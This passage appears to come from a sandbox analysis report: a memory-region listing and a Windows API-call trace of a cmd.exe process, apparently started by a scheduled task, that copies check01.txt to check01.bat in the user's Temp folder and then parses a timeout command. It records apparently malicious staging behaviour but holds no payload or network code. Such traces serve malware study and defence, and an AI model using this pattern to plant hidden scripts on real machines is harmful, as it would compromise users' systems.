entry_point = 0x7fefb8b11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 1573
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1574
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1575
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1576
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1577
start_va = 0x320000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 1578
start_va = 0x320000
end_va = 0x41ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 1579
start_va = 0x480000
end_va = 0x48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 1580
start_va = 0x170000
end_va = 0x198fff
monitored = 0
entry_point = 0x171010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1581
start_va = 0x490000
end_va = 0x617fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000490000"
filename = ""
Region:
id = 1582
start_va = 0x170000
end_va = 0x198fff
monitored = 0
entry_point = 0x171010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1583
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1584
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1585
start_va = 0x620000
end_va = 0x7a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 1586
start_va = 0x7b0000
end_va = 0x1baffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007b0000"
filename = ""
Region:
id = 1587
start_va = 0x50000
end_va = 0x6ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 1588
start_va = 0x70000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 1589
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 1590
start_va = 0x180000
end_va = 0x180fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 1591
start_va = 0x190000
end_va = 0x19ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 1592
start_va = 0x1bb0000
end_va = 0x1e7efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 83
os_tid = 0xb44
[0372.690] GetProcAddress (hModule=0x77660000, lpProcName="SetConsoleInputExeNameW") returned 0x77670c80
[0372.691] GetProcessHeap () returned 0x70000
[0372.691] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x4012) returned 0x8c620
[0372.691] GetProcessHeap () returned 0x70000
[0372.692] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8c620 | out: hHeap=0x70000) returned 1
[0372.693] _wcsicmp (_String1="copy", _String2=")") returned 58
[0372.693] _wcsicmp (_String1="FOR", _String2="copy") returned 3
[0372.693] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3
[0372.693] _wcsicmp (_String1="IF", _String2="copy") returned 6
[0372.693] _wcsicmp (_String1="IF/?", _String2="copy") returned 6
[0372.693] _wcsicmp (_String1="REM", _String2="copy") returned 15
[0372.694] _wcsicmp (_String1="REM/?", _String2="copy") returned 15
[0372.694] GetProcessHeap () returned 0x70000
[0372.694] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb0) returned 0x89eb0
[0372.694] GetProcessHeap () returned 0x70000
[0372.694] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x1a) returned 0x84750
[0372.702] GetProcessHeap () returned 0x70000
[0372.702] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xe6) returned 0x89f70
[0372.704] GetProcessHeap () returned 0x70000
[0372.704] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb0) returned 0x8a060
[0372.706] _wcsicmp (_String1="timeout", _String2=")") returned 75
[0372.706] _wcsicmp (_String1="FOR", _String2="timeout") returned -14
[0372.706] _wcsicmp (_String1="FOR/?", _String2="timeout") returned -14
[0372.706] _wcsicmp (_String1="IF", _String2="timeout") returned -11
[0372.706] _wcsicmp (_String1="IF/?", _String2="timeout") returned -11
[0372.706] _wcsicmp (_String1="REM", _String2="timeout") returned -2
[0372.706] _wcsicmp (_String1="REM/?", _String2="timeout") returned -2
[0372.706] GetProcessHeap () returned 0x70000
[0372.706] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb0) returned 0x8a120
[0372.706] GetProcessHeap () returned 0x70000
[0372.706] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x20) returned 0x84780
[0372.707] GetProcessHeap () returned 0x70000
[0372.707] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x16) returned 0x88610
[0372.709] GetConsoleTitleW (in: lpConsoleTitle=0x2af910, nSize=0x104 | out: lpConsoleTitle="taskeng.exe") returned 0xb
[0372.710] _wcsicmp (_String1="copy", _String2="DIR") returned -1
[0372.710] _wcsicmp (_String1="copy", _String2="ERASE") returned -2
[0372.710] _wcsicmp (_String1="copy", _String2="DEL") returned -1
[0372.711] _wcsicmp (_String1="copy", _String2="TYPE") returned -17
[0372.711] _wcsicmp (_String1="copy", _String2="COPY") returned 0
[0372.711] GetProcessHeap () returned 0x70000
[0372.711] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x1bc) returned 0x8a1e0
[0372.713] GetProcessHeap () returned 0x70000
[0372.713] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x8a1e0, Size=0xe6) returned 0x8a1e0
[0372.713] GetProcessHeap () returned 0x70000
[0372.713] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x8a1e0) returned 0xe6
[0372.716] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0372.716] GetProcessHeap () returned 0x70000
[0372.716] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xf0) returned 0x8a2e0
[0372.716] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a28c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0372.716] GetProcessHeap () returned 0x70000
[0372.716] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x58) returned 0x71320
[0372.716] GetProcessHeap () returned 0x70000
[0372.716] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x58) returned 0x71380
[0372.717] GetProcessHeap () returned 0x70000
[0372.717] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x20) returned 0x847b0
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
[0372.717] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
[0372.718] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
[0372.718] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.721] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0372.722] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0372.722] GetProcessHeap () returned 0x70000
[0372.723] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x847b0 | out: hHeap=0x70000) returned 1
[0372.725] GetProcessHeap () returned 0x70000
[0372.725] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x20) returned 0x847b0
[0372.725] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
[0372.725] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
[0372.725] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
[0372.725] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
[0372.726] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
[0372.727] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0372.728] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
[0372.728] GetProcessHeap () returned 0x70000
[0372.729] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x847b0 | out: hHeap=0x70000) returned 1
[0372.729] GetProcessHeap () returned 0x70000
[0372.729] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x1bc) returned 0x713e0
[0372.731] GetProcessHeap () returned 0x70000
[0372.731] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x713e0, Size=0xe6) returned 0x713e0
[0372.731] GetProcessHeap () returned 0x70000
[0372.731] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x713e0) returned 0xe6
[0372.731] _wcsnicmp (_String1="/y", _String2="/Y", _MaxCount=0x2) returned 0
[0372.731] GetProcessHeap () returned 0x70000
[0372.731] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x58) returned 0x714e0
[0372.731] GetProcessHeap () returned 0x70000
[0372.731] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x260) returned 0x71540
[0372.732] _wcsicmp (_String1="check01.txt", _String2=".") returned 53
[0372.732] _wcsicmp (_String1="check01.txt", _String2="..") returned 53
[0372.732] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt")) returned 0x2020
[0372.734] GetProcessHeap () returned 0x70000
[0372.734] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x58) returned 0x717b0
[0372.734] GetProcessHeap () returned 0x70000
[0372.734] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x260) returned 0x71810
[0372.734] _wcsicmp (_String1="check01.bat", _String2=".") returned 53
[0372.734] _wcsicmp (_String1="check01.bat", _String2="..") returned 53
[0372.734] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x2af678, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x2af678, ReturnLength=0x0) returned 0x0
[0372.735] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x2af674, ProcessInformationLength=0x4) returned 0x0
[0372.735] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x190000
[0372.735] FindFirstFileExW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt"), fInfoLevelId=0x1, lpFindFileData=0x71550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71550) returned 0x71a80
[0372.735] GetProcessHeap () returned 0x70000
[0372.735] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x0, Size=0x28) returned 0x847b0
[0372.736] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x104, lpBuffer=0x2ae490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x0) returned 0x30
[0372.736] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", _String2="con") returned -53
[0372.736] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ae6b0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x58
[0372.736] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3
[0372.737] _get_osfhandle (_FileHandle=3) returned 0x58
[0372.737] GetFileType (hFile=0x58) returned 0x1
[0372.737] SetErrorMode (uMode=0x0) returned 0x8001
[0372.737] SetErrorMode (uMode=0x1) returned 0x0
[0372.737] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", nBufferLength=0x208, lpBuffer=0x2aefd0, lpFilePart=0x2ae700 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", lpFilePart=0x2ae700*="check01.txt") returned 0x30
[0372.737] SetErrorMode (uMode=0x8001) returned 0x1
[0372.738] _get_osfhandle (_FileHandle=3) returned 0x58
[0372.738] ReadFile (in: hFile=0x58, lpBuffer=0x190000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae734, lpOverlapped=0x0 | out: lpBuffer=0x190000*, lpNumberOfBytesRead=0x2ae734*=0x200, lpOverlapped=0x0) returned 1
[0372.740] SetErrorMode (uMode=0x0) returned 0x8001
[0372.741] SetErrorMode (uMode=0x1) returned 0x0
[0372.741] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x208, lpBuffer=0x2ae2c0, lpFilePart=0x2ae2b0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x2ae2b0*="check01.bat") returned 0x30
[0372.741] SetErrorMode (uMode=0x8001) returned 0x1
[0372.741] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", _String2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat") returned 18
[0372.741] GetProcessHeap () returned 0x70000
[0372.741] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x260) returned 0x71ae0
[0372.741] _wcsicmp (_String1="check01.bat", _String2=".") returned 53
[0372.741] _wcsicmp (_String1="check01.bat", _String2="..") returned 53
[0372.742] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat")) returned 0xffffffff
[0372.742] GetLastError () returned 0x2
[0372.742] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x104, lpBuffer=0x2ae490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x0) returned 0x30
[0372.742] SetErrorMode (uMode=0x0) returned 0x8001
[0372.743] SetErrorMode (uMode=0x1) returned 0x0
[0372.743] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x208, lpBuffer=0x2ae2c0, lpFilePart=0x2ae2b0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x2ae2b0*="check01.bat") returned 0x30
[0372.744] SetErrorMode (uMode=0x8001) returned 0x1
[0372.744] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", _String2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat") returned 18
[0372.744] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat")) returned 0xffffffff
[0372.744] CopyFileExW (lpExistingFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt"), lpNewFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x4a27e19c, dwCopyFlags=0x0) returned 1
[0372.763] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat")) returned 0x2020
[0372.763] SetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", dwFileAttributes=0x2020) returned 1
[0372.764] _close (_FileHandle=3) returned 0
[0372.764] _get_osfhandle (_FileHandle=-1) returned 0xffffffffffffffff
[0372.764] GetFileType (hFile=0xffffffffffffffff) returned 0x0
[0372.764] _get_osfhandle (_FileHandle=-1) returned 0xffffffffffffffff
[0372.764] SetFileTime (hFile=0xffffffffffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x2ae798) returned 0
[0372.765] FindNextFileW (in: hFindFile=0x71a80, lpFindFileData=0x71550 | out: lpFindFileData=0x71550*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99073dc0, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0x99073dc0, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0x99073dc0, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0xf32, dwReserved0=0x0, dwReserved1=0x0, cFileName="check01.txt", cAlternateFileName="")) returned 0
[0372.767] GetLastError () returned 0x12
[0372.767] FindClose (in: hFindFile=0x71a80 | out: hFindFile=0x71a80) returned 1
[0372.767] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x2af678, ProcessInformationLength=0x4) returned 0x0
[0372.768] _vsnwprintf (in: _Buffer=0x4a29ad20, _BufferCount=0x103, _Format="%9d", _ArgList=0x2af658 | out: _Buffer=" 1") returned 9
[0372.768] _get_osfhandle (_FileHandle=1) returned 0x7
[0372.768] GetFileType (hFile=0x7) returned 0x2
[0372.769] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0372.769] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af578 | out: lpMode=0x2af578) returned 1
[0372.769] _get_osfhandle (_FileHandle=1) returned 0x7
[0372.770] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2af5b0 | out: lpConsoleScreenBufferInfo=0x2af5b0) returned 1
[0372.770] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4a296340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14
[0372.771] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4a296340, nSize=0x2000, Arguments=0x2af620 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b
[0372.771] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a296340*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x2af5a0, lpReserved=0x0 | out: lpBuffer=0x4a296340*, lpNumberOfCharsWritten=0x2af5a0*=0x1b) returned 1
[0372.772] GetConsoleTitleW (in: lpConsoleTitle=0x2af910, nSize=0x104 | out: lpConsoleTitle="taskeng.exe") returned 0xb
[0372.773] _wcsicmp (_String1="timeout", _String2="DIR") returned 16
[0372.773] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15
[0372.773] _wcsicmp (_String1="timeout", _String2="DEL") returned 16
[0372.773] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16
[0372.774] _wcsicmp (_String1="timeout", _String2="COPY") returned 17
[0372.774] _wcsicmp (_String1="timeout", _String2="CD") returned 17
[0372.774] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17
[0372.774] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2
[0372.775] _wcsicmp (_String1="timeout", _String2="REN") returned 2
[0372.775] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15
[0372.775] _wcsicmp (_String1="timeout", _String2="SET") returned 1
[0372.775] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4
[0372.775] _wcsicmp (_String1="timeout", _String2="DATE") returned 16
[0372.775] _wcsicmp (_String1="timeout", _String2="TIME") returned 111
[0372.775] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4
[0372.775] _wcsicmp (_String1="timeout", _String2="MD") returned 7
[0372.775] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7
[0372.775] _wcsicmp (_String1="timeout", _String2="RD") returned 2
[0372.775] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2
[0372.776] _wcsicmp (_String1="timeout", _String2="PATH") returned 4
[0372.776] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13
[0372.776] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1
[0372.776] _wcsicmp (_String1="timeout", _String2="CLS") returned 17
[0372.776] _wcsicmp (_String1="timeout", _String2="CALL") returned 17
[0372.776] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2
